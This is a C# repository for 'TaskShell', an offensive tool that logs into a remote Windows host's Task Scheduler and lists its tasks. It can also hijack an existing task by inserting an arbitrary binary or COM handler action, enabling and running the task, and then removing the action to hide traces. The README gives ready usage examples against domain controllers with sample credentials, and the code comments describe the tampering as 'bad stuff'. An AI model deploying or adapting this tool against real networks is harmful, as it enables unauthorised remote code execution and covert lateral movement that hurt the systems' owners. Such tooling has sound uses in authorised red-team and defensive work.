├── .gitignore
├── README.md
├── TaskShell.sln
└── TaskShell
├── App.config
├── FodyWeavers.xml
├── FodyWeavers.xsd
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── TaskShell.csproj
└── packages.config
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Created by https://www.toptal.com/developers/gitignore/api/visualstudio,csharp
3 | # Edit at https://www.toptal.com/developers/gitignore?templates=visualstudio,csharp
4 |
5 | ### Csharp ###
6 | ## Ignore Visual Studio temporary files, build results, and
7 | ## files generated by popular Visual Studio add-ons.
8 | ##
9 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
10 |
11 | # User-specific files
12 | *.rsuser
13 | *.suo
14 | *.user
15 | *.userosscache
16 | *.sln.docstates
17 |
18 | # User-specific files (MonoDevelop/Xamarin Studio)
19 | *.userprefs
20 |
21 | # Mono auto generated files
22 | mono_crash.*
23 |
24 | # Build results
25 | [Dd]ebug/
26 | [Dd]ebugPublic/
27 | [Rr]elease/
28 | [Rr]eleases/
29 | x64/
30 | x86/
31 | [Aa][Rr][Mm]/
32 | [Aa][Rr][Mm]64/
33 | bld/
34 | [Bb]in/
35 | [Oo]bj/
36 | [Ll]og/
37 | [Ll]ogs/
38 |
39 | # Visual Studio 2015/2017 cache/options directory
40 | .vs/
41 | # Uncomment if you have tasks that create the project's static files in wwwroot
42 | #wwwroot/
43 |
44 | # Visual Studio 2017 auto generated files
45 | Generated\ Files/
46 |
47 | # MSTest test Results
48 | [Tt]est[Rr]esult*/
49 | [Bb]uild[Ll]og.*
50 |
51 | # NUnit
52 | *.VisualState.xml
53 | TestResult.xml
54 | nunit-*.xml
55 |
56 | # Build Results of an ATL Project
57 | [Dd]ebugPS/
58 | [Rr]eleasePS/
59 | dlldata.c
60 |
61 | # Benchmark Results
62 | BenchmarkDotNet.Artifacts/
63 |
64 | # .NET Core
65 | project.lock.json
66 | project.fragment.lock.json
67 | artifacts/
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*[.json, .xml, .info]
147 |
148 | # Visual Studio code coverage results
149 | *.coverage
150 | *.coveragexml
151 |
152 | # NCrunch
153 | _NCrunch_*
154 | .*crunch*.local.xml
155 | nCrunchTemp_*
156 |
157 | # MightyMoose
158 | *.mm.*
159 | AutoTest.Net/
160 |
161 | # Web workbench (sass)
162 | .sass-cache/
163 |
164 | # Installshield output folder
165 | [Ee]xpress/
166 |
167 | # DocProject is a documentation generator add-in
168 | DocProject/buildhelp/
169 | DocProject/Help/*.HxT
170 | DocProject/Help/*.HxC
171 | DocProject/Help/*.hhc
172 | DocProject/Help/*.hhk
173 | DocProject/Help/*.hhp
174 | DocProject/Help/Html2
175 | DocProject/Help/html
176 |
177 | # Click-Once directory
178 | publish/
179 |
180 | # Publish Web Output
181 | *.[Pp]ublish.xml
182 | *.azurePubxml
183 | # Note: Comment the next line if you want to checkin your web deploy settings,
184 | # but database connection strings (with potential passwords) will be unencrypted
185 | *.pubxml
186 | *.publishproj
187 |
188 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
189 | # checkin your Azure Web App publish settings, but sensitive information contained
190 | # in these scripts will be unencrypted
191 | PublishScripts/
192 |
193 | # NuGet Packages
194 | *.nupkg
195 | # NuGet Symbol Packages
196 | *.snupkg
197 | # The packages folder can be ignored because of Package Restore
198 | **/[Pp]ackages/*
199 | # except build/, which is used as an MSBuild target.
200 | !**/[Pp]ackages/build/
201 | # Uncomment if necessary however generally it will be regenerated when needed
202 | #!**/[Pp]ackages/repositories.config
203 | # NuGet v3's project.json files produces more ignorable files
204 | *.nuget.props
205 | *.nuget.targets
206 |
207 | # Microsoft Azure Build Output
208 | csx/
209 | *.build.csdef
210 |
211 | # Microsoft Azure Emulator
212 | ecf/
213 | rcf/
214 |
215 | # Windows Store app package directories and files
216 | AppPackages/
217 | BundleArtifacts/
218 | Package.StoreAssociation.xml
219 | _pkginfo.txt
220 | *.appx
221 | *.appxbundle
222 | *.appxupload
223 |
224 | # Visual Studio cache files
225 | # files ending in .cache can be ignored
226 | *.[Cc]ache
227 | # but keep track of directories ending in .cache
228 | !?*.[Cc]ache/
229 |
230 | # Others
231 | ClientBin/
232 | ~$*
233 | *~
234 | *.dbmdl
235 | *.dbproj.schemaview
236 | *.jfm
237 | *.pfx
238 | *.publishsettings
239 | orleans.codegen.cs
240 |
241 | # Including strong name files can present a security risk
242 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
243 | #*.snk
244 |
245 | # Since there are multiple workflows, uncomment next line to ignore bower_components
246 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
247 | #bower_components/
248 |
249 | # RIA/Silverlight projects
250 | Generated_Code/
251 |
252 | # Backup & report files from converting an old project file
253 | # to a newer Visual Studio version. Backup files are not needed,
254 | # because we have git ;-)
255 | _UpgradeReport_Files/
256 | Backup*/
257 | UpgradeLog*.XML
258 | UpgradeLog*.htm
259 | ServiceFabricBackup/
260 | *.rptproj.bak
261 |
262 | # SQL Server files
263 | *.mdf
264 | *.ldf
265 | *.ndf
266 |
267 | # Business Intelligence projects
268 | *.rdl.data
269 | *.bim.layout
270 | *.bim_*.settings
271 | *.rptproj.rsuser
272 | *- [Bb]ackup.rdl
273 | *- [Bb]ackup ([0-9]).rdl
274 | *- [Bb]ackup ([0-9][0-9]).rdl
275 |
276 | # Microsoft Fakes
277 | FakesAssemblies/
278 |
279 | # GhostDoc plugin setting file
280 | *.GhostDoc.xml
281 |
282 | # Node.js Tools for Visual Studio
283 | .ntvs_analysis.dat
284 | node_modules/
285 |
286 | # Visual Studio 6 build log
287 | *.plg
288 |
289 | # Visual Studio 6 workspace options file
290 | *.opt
291 |
292 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
293 | *.vbw
294 |
295 | # Visual Studio LightSwitch build output
296 | **/*.HTMLClient/GeneratedArtifacts
297 | **/*.DesktopClient/GeneratedArtifacts
298 | **/*.DesktopClient/ModelManifest.xml
299 | **/*.Server/GeneratedArtifacts
300 | **/*.Server/ModelManifest.xml
301 | _Pvt_Extensions
302 |
303 | # Paket dependency manager
304 | .paket/paket.exe
305 | paket-files/
306 |
307 | # FAKE - F# Make
308 | .fake/
309 |
310 | # CodeRush personal settings
311 | .cr/personal
312 |
313 | # Python Tools for Visual Studio (PTVS)
314 | __pycache__/
315 | *.pyc
316 |
317 | # Cake - Uncomment if you are using it
318 | # tools/**
319 | # !tools/packages.config
320 |
321 | # Tabs Studio
322 | *.tss
323 |
324 | # Telerik's JustMock configuration file
325 | *.jmconfig
326 |
327 | # BizTalk build output
328 | *.btp.cs
329 | *.btm.cs
330 | *.odx.cs
331 | *.xsd.cs
332 |
333 | # OpenCover UI analysis results
334 | OpenCover/
335 |
336 | # Azure Stream Analytics local run output
337 | ASALocalRun/
338 |
339 | # MSBuild Binary and Structured Log
340 | *.binlog
341 |
342 | # NVidia Nsight GPU debugger configuration file
343 | *.nvuser
344 |
345 | # MFractors (Xamarin productivity tool) working folder
346 | .mfractor/
347 |
348 | # Local History for Visual Studio
349 | .localhistory/
350 |
351 | # BeatPulse healthcheck temp database
352 | healthchecksdb
353 |
354 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
355 | MigrationBackup/
356 |
357 | # Ionide (cross platform F# VS Code tools) working folder
358 | .ionide/
359 |
360 | ### VisualStudio ###
361 |
362 | # User-specific files
363 |
364 | # User-specific files (MonoDevelop/Xamarin Studio)
365 |
366 | # Mono auto generated files
367 |
368 | # Build results
369 |
370 | # Visual Studio 2015/2017 cache/options directory
371 | # Uncomment if you have tasks that create the project's static files in wwwroot
372 |
373 | # Visual Studio 2017 auto generated files
374 |
375 | # MSTest test Results
376 |
377 | # NUnit
378 |
379 | # Build Results of an ATL Project
380 |
381 | # Benchmark Results
382 |
383 | # .NET Core
384 |
385 | # StyleCop
386 |
387 | # Files built by Visual Studio
388 |
389 | # Chutzpah Test files
390 |
391 | # Visual C++ cache files
392 |
393 | # Visual Studio profiler
394 |
395 | # Visual Studio Trace Files
396 |
397 | # TFS 2012 Local Workspace
398 |
399 | # Guidance Automation Toolkit
400 |
401 | # ReSharper is a .NET coding add-in
402 |
403 | # TeamCity is a build add-in
404 |
405 | # DotCover is a Code Coverage Tool
406 |
407 | # AxoCover is a Code Coverage Tool
408 |
409 | # Coverlet is a free, cross platform Code Coverage Tool
410 |
411 | # Visual Studio code coverage results
412 |
413 | # NCrunch
414 |
415 | # MightyMoose
416 |
417 | # Web workbench (sass)
418 |
419 | # Installshield output folder
420 |
421 | # DocProject is a documentation generator add-in
422 |
423 | # Click-Once directory
424 |
425 | # Publish Web Output
426 | # Note: Comment the next line if you want to checkin your web deploy settings,
427 | # but database connection strings (with potential passwords) will be unencrypted
428 |
429 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
430 | # checkin your Azure Web App publish settings, but sensitive information contained
431 | # in these scripts will be unencrypted
432 |
433 | # NuGet Packages
434 | # NuGet Symbol Packages
435 | # The packages folder can be ignored because of Package Restore
436 | # except build/, which is used as an MSBuild target.
437 | # Uncomment if necessary however generally it will be regenerated when needed
438 | # NuGet v3's project.json files produces more ignorable files
439 |
440 | # Microsoft Azure Build Output
441 |
442 | # Microsoft Azure Emulator
443 |
444 | # Windows Store app package directories and files
445 |
446 | # Visual Studio cache files
447 | # files ending in .cache can be ignored
448 | # but keep track of directories ending in .cache
449 |
450 | # Others
451 |
452 | # Including strong name files can present a security risk
453 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
454 |
455 | # Since there are multiple workflows, uncomment next line to ignore bower_components
456 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
457 |
458 | # RIA/Silverlight projects
459 |
460 | # Backup & report files from converting an old project file
461 | # to a newer Visual Studio version. Backup files are not needed,
462 | # because we have git ;-)
463 |
464 | # SQL Server files
465 |
466 | # Business Intelligence projects
467 |
468 | # Microsoft Fakes
469 |
470 | # GhostDoc plugin setting file
471 |
472 | # Node.js Tools for Visual Studio
473 |
474 | # Visual Studio 6 build log
475 |
476 | # Visual Studio 6 workspace options file
477 |
478 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
479 |
480 | # Visual Studio LightSwitch build output
481 |
482 | # Paket dependency manager
483 |
484 | # FAKE - F# Make
485 |
486 | # CodeRush personal settings
487 |
488 | # Python Tools for Visual Studio (PTVS)
489 |
490 | # Cake - Uncomment if you are using it
491 | # tools/**
492 | # !tools/packages.config
493 |
494 | # Tabs Studio
495 |
496 | # Telerik's JustMock configuration file
497 |
498 | # BizTalk build output
499 |
500 | # OpenCover UI analysis results
501 |
502 | # Azure Stream Analytics local run output
503 |
504 | # MSBuild Binary and Structured Log
505 |
506 | # NVidia Nsight GPU debugger configuration file
507 |
508 | # MFractors (Xamarin productivity tool) working folder
509 |
510 | # Local History for Visual Studio
511 |
512 | # BeatPulse healthcheck temp database
513 |
514 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
515 |
516 | # Ionide (cross platform F# VS Code tools) working folder
517 |
518 | # End of https://www.toptal.com/developers/gitignore/api/visualstudio,csharp
519 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # TaskShell
2 |
3 | ## Usage
4 |
5 | ```
6 |
7 | -h, --Host Required. The remote host
8 |
9 | -u, --Username The remote host
10 |
11 | -p, --Password The password
12 |
13 | -d, --Domain The remote domain
14 |
15 | -t, --Task Fetch info of a specific task
16 |
17 | -b, --Binary The binary to tamper the scheduled task with
18 |
19 | -a, --arguments Additional command line arguments for the task
20 |
21 | -r, --Run Run the task after modifying it
22 |
23 | -s, --Search Search for a specific task
24 |
25 | -c, --Clsid The CLSID to use as a COM handler
26 |
27 | --help Display this help screen.
28 |
29 | --version Display version information.
30 | ```
31 |
32 | ## Examples
33 |
34 | ```
35 | # Enumerate tasks on a remote host using current user
36 | TaskShell.exe -h DC01
37 |
38 | # Authenticate using explicit credentials
39 | TaskShell.exe -h DC01 -u Administraor -p Password1 -d domain.com
40 |
41 | # Search for a task name (case sensitive)
42 | TaskShell.exe -h DC01 -s "OneDrive"
43 |
44 | # or a user
45 | TaskShell.exe -h DC01 -s "SYSTEM"
46 |
47 | TaskShell.exe -h DC01 -s "Users"
48 |
49 | # Get info about a specific task
50 | TaskShell.exe -h 172.16.119.140 -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
51 | Diagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"
52 |
53 | # Tamper the task with a binary action
54 | TaskShell.exe -h 172.16.119.140 -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
55 | Diagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" -b notepad.exe -r
56 |
57 | # using arguments is supported as well
58 | TaskShell.exe -h 172.16.119.140 -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Mobi
59 | le Broadband Accounts\MNO Metadata Parser" -b cmd.exe -a "/C notepad.exe" -r
60 |
61 | # Tamper the task with a COM handler
62 | TaskShell.exe -h 172.16.119.140 -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
63 | Diagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" -c "75DFF2B7-6936-4C06-A8BB-676A7B00B24B" -r
64 |
65 | ```
--------------------------------------------------------------------------------
/TaskShell.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29806.167
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TaskShell", "TaskShell\TaskShell.csproj", "{AB4120BD-140B-41DC-BD9F-33C935F48CFE}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {162D6049-71D4-465C-AE35-926641D45D9B}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/TaskShell/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/TaskShell/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/TaskShell/FodyWeavers.xsd:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
13 |
14 |
15 |
16 |
17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
18 |
19 |
20 |
21 |
22 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
23 |
24 |
25 |
26 |
27 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
28 |
29 |
30 |
31 |
32 | The order of preloaded assemblies, delimited with line breaks.
33 |
34 |
35 |
36 |
37 |
38 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
39 |
40 |
41 |
42 |
43 | Controls if .pdbs for reference assemblies are also embedded.
44 |
45 |
46 |
47 |
48 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
49 |
50 |
51 |
52 |
53 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
54 |
55 |
56 |
57 |
58 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
59 |
60 |
61 |
62 |
63 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
64 |
65 |
66 |
67 |
68 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
69 |
70 |
71 |
72 |
73 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
74 |
75 |
76 |
77 |
78 | A list of unmanaged 32 bit assembly names to include, delimited with |.
79 |
80 |
81 |
82 |
83 | A list of unmanaged 64 bit assembly names to include, delimited with |.
84 |
85 |
86 |
87 |
88 | The order of preloaded assemblies, delimited with |.
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
97 |
98 |
99 |
100 |
101 | A comma-separated list of error codes that can be safely ignored in assembly verification.
102 |
103 |
104 |
105 |
106 | 'false' to turn off automatic generation of the XML Schema file.
107 |
108 |
109 |
110 |
111 |
--------------------------------------------------------------------------------
/TaskShell/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using CommandLine;
7 | using Microsoft.Win32.TaskScheduler;
8 | using Action = Microsoft.Win32.TaskScheduler.Action;
9 | using Task = Microsoft.Win32.TaskScheduler.Task;
10 | using Microsoft.Win32;
11 |
12 |
13 | namespace TaskShell
14 | {
15 | public class Options
16 | {
17 |
18 | [Option('h', "Host", Required = true, HelpText = "The remote host")]
19 | public string Host { get; set; }
20 |
21 | [Option('u', "Username", Required = false, HelpText = "The remote host")]
22 | public string Username { get; set; }
23 |
24 | [Option('p', "Password", Required = false, HelpText = "The password")]
25 | public string Password { get; set; }
26 |
27 | [Option('d', "Domain", Required = false, HelpText = "The remote domain")]
28 | public string Domain { get; set; }
29 |
30 | [Option('t', "Task", Required = false, HelpText = "Fetch info of a specific task")]
31 | public string Task { get; set; }
32 |
33 | [Option('b', "Binary", Required = false, HelpText = "The binary to tamper the scheduled task with")]
34 | public string Binary { get; set; }
35 |
36 | [Option('a', "arguments", Required = false, HelpText = "Additional command line arguments for the task")]
37 | public string Arguments { get; set; }
38 |
39 | [Option('r', "Run", Required = false, HelpText = "Run the task after modifying it")]
40 | public bool Run { get; set; }
41 |
42 | [Option('s', "Search", Required = false, HelpText = "Search for a specific task")]
43 | public string Search { get; set; }
44 |
45 | [Option('c', "Clsid", Required = false, HelpText = "The CLSID to use as a COM handler")]
46 | public string Clsid { get; set; }
47 | }
48 |
49 | class Program
50 | {
51 | static TaskService AuthenticateToRemoteHost(string host = "127.0.0.1", string username = "", string password = "", string domain = "")
52 | {
53 | try
54 | {
55 | if (username != null && password != null && domain != null)
56 | {
57 | Console.WriteLine("[+] Authenticating using explicit credentials");
58 | TaskService ts = new TaskService(@"\\" + host, username, domain, password);
59 | return ts;
60 |
61 | }
62 |
63 | else
64 | {
65 | Console.WriteLine("[+] Authenticating using current user's token");
66 | TaskService ts = new TaskService(@"\\" + host);
67 | return ts;
68 | }
69 | }
70 | catch (System.UnauthorizedAccessException e)
71 | {
72 | Console.WriteLine("[-] Something went wrong with the authentication, check your creds: " + e.Message);
73 | return null;
74 | }
75 | }
76 | static void EnumAllTasks(string search, string host = "127.0.0.1", string username = "", string password = "", string domain = "")
77 | {
78 | TaskService ts = AuthenticateToRemoteHost(host, username, password, domain);
79 | if (ts != null)
80 | EnumFolderTasks(search, ts.RootFolder);
81 |
82 | }
83 |
84 | static void GetTaskInfo(string taskName, string host = "127.0.0.1", string username = "", string password = "", string domain = "")
85 | {
86 | TaskService ts = AuthenticateToRemoteHost(host, username, password, domain);
87 | if (ts != null)
88 | {
89 | Task t = ts.GetTask(taskName);
90 | if (t == null)
91 | {
92 | Console.WriteLine("[+] Task not found!");
93 | return;
94 | }
95 |
96 | ActOnTask(t);
97 | }
98 | }
99 |
100 | static void EnumFolderTasks(string search, TaskFolder fld)
101 | {
102 | foreach (Microsoft.Win32.TaskScheduler.Task task in fld.Tasks)
103 | ActOnTask(task, search);
104 | foreach (TaskFolder sfld in fld.SubFolders)
105 | EnumFolderTasks(search, sfld);
106 | }
107 |
108 | static void ActOnTask(Task t, string search = "")
109 | {
110 | // Do something interesting here
111 |
112 | if (search != "")
113 | {
114 |
115 | }
116 | if (t.Path.Contains(search) || t.Definition.Principal.ToString().Contains(search))
117 | {
118 |
119 | Console.WriteLine("\r\n============================");
120 | Console.WriteLine("[+] Path: " + t.Path);
121 | Console.WriteLine("[+] Principal: " + t.Definition.Principal);
122 |
123 | foreach (Action action in t.Definition.Actions)
124 | {
125 |
126 | Console.WriteLine("[+] Action: " + action.ToString());
127 |
128 | if (t.Definition.Triggers.Count > 0)
129 | {
130 | foreach (Trigger trigger in t.Definition.Triggers)
131 | {
132 | Console.WriteLine(trigger.ToString());
133 |
134 | }
135 | }
136 | }
137 | }
138 | }
139 |
140 | static void Main(string[] args)
141 | {
142 | var Options = new Options();
143 | Parser.Default.ParseArguments(args).WithParsed(o =>
144 | {
145 |
146 | if (o.Host != null)
147 | {
148 |
149 | if (o.Task != null && o.Binary == null && o.Clsid == null)
150 | {
151 | // we want to narrow down a specific task
152 | GetTaskInfo(o.Task, o.Host, o.Username, o.Password, o.Domain);
153 | }
154 | else if (o.Task != null && o.Binary != null)
155 | {
156 | // now we do bad stuff
157 | TamperTask(o.Task, o.Binary, o.Arguments, o.Run, o.Host, o.Username, o.Password, o.Domain);
158 | }
159 |
160 | else if (o.Task != null && o.Clsid != null)
161 | {
162 | // now we do bad stuff
163 | Console.WriteLine("LOLL");
164 | TamperTask(o.Task, o.Clsid, "", o.Run, o.Host, o.Username, o.Password, o.Domain);
165 | }
166 | else
167 | {
168 | // by default we enumerate all the tasks in the remote host
169 | if (o.Search != null)
170 | EnumAllTasks(o.Search, o.Host, o.Username, o.Password, o.Domain);
171 | else
172 | EnumAllTasks("", o.Host, o.Username, o.Password, o.Domain);
173 |
174 | }
175 | }
176 | else
177 | {
178 | Console.WriteLine("[-] missing host parameter");
179 | return;
180 | }
181 |
182 | });
183 |
184 | }
185 |
186 | private static void TamperTask(string task, string binary, string arguments, bool run, string host, string username, string password, string domain)
187 | {
188 | TaskService ts = AuthenticateToRemoteHost(host, username, password, domain);
189 | if (ts != null)
190 | {
191 | Task t = ts.GetTask(task);
192 | if (t == null)
193 | {
194 | Console.WriteLine("[+] Task not found!");
195 | return;
196 | }
197 |
198 |
199 | if (binary.Split('-').Length == 5) // weak parsing, I know but YOLO
200 | {
201 | // we suppose we want to execute a COM object and not a binary
202 | ComHandlerAction action = new ComHandlerAction(new Guid(binary), string.Empty);
203 | // add to the top of the list, otherwise it will not execute
204 | Console.WriteLine("[+] Adding custom action to task.. ");
205 | t.Definition.Actions.Insert(0, action);
206 |
207 | // enable the task in case it's disabled
208 | Console.WriteLine("[+] Enabling the task");
209 | t.Definition.Settings.Enabled = true;
210 | t.RegisterChanges();
211 |
212 | GetTaskInfo(task, host, username, password, domain);
213 | Console.WriteLine("\r\n");
214 | // run it
215 | if (run)
216 | {
217 | Console.WriteLine("[+] Triggering execution");
218 | t.Run();
219 | }
220 |
221 |
222 | Console.WriteLine("[+] Cleaning up");
223 | // remove the new action
224 | t.Definition.Actions.Remove(action);
225 | t.RegisterChanges();
226 |
227 | } else
228 | {
229 | ExecAction action = new ExecAction(binary, arguments, null);
230 |
231 | // add to the top of the list, otherwise it will not execute
232 | Console.WriteLine("[+] Adding custom action to task.. ");
233 | t.Definition.Actions.Insert(0, action);
234 |
235 | // enable the task in case it's disabled
236 | Console.WriteLine("[+] Enabling the task");
237 | t.Definition.Settings.Enabled = true;
238 | t.RegisterChanges();
239 |
240 | GetTaskInfo(task, host, username, password, domain);
241 | Console.WriteLine("\r\n");
242 | // run it
243 | if (run)
244 | {
245 | Console.WriteLine("[+] Triggering execution");
246 | t.Run();
247 | }
248 |
249 |
250 | Console.WriteLine("[+] Cleaning up");
251 | // remove the new action
252 | t.Definition.Actions.Remove(action);
253 | t.RegisterChanges();
254 | }
255 |
256 |
257 | }
258 | }
259 | }
260 | }
261 |
--------------------------------------------------------------------------------
/TaskShell/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("TaskShell")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("TaskShell")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("ab4120bd-140b-41dc-bd9f-33c935f48cfe")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/TaskShell/TaskShell.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {AB4120BD-140B-41DC-BD9F-33C935F48CFE}
9 | Exe
10 | TaskShell
11 | TaskShell
12 | v4.5
13 | 512
14 | true
15 |
16 |
17 |
18 |
19 | AnyCPU
20 | true
21 | full
22 | false
23 | bin\Debug\
24 | DEBUG;TRACE
25 | prompt
26 | 4
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 |
37 |
38 |
39 | ..\packages\CommandLineParser.2.8.0\lib\net45\CommandLine.dll
40 |
41 |
42 | ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
43 |
44 |
45 | ..\packages\TaskScheduler.2.9.0\lib\net40\Microsoft.Win32.TaskScheduler.dll
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
70 |
71 |
72 |
73 |
74 |
--------------------------------------------------------------------------------
/TaskShell/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------